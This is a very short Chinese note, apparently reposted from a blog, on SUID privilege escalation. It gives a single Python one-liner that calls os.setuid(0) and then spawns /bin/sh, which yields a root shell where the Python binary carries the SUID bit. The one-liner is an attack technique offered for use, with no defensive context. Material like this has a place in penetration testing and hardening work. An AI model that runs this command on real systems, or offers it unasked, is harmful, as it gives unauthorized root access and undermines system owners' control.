SUID提权之python的os.setuid(0)提权

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

原文地址:https://www.cnblogs.com/0day-li/p/15129108.html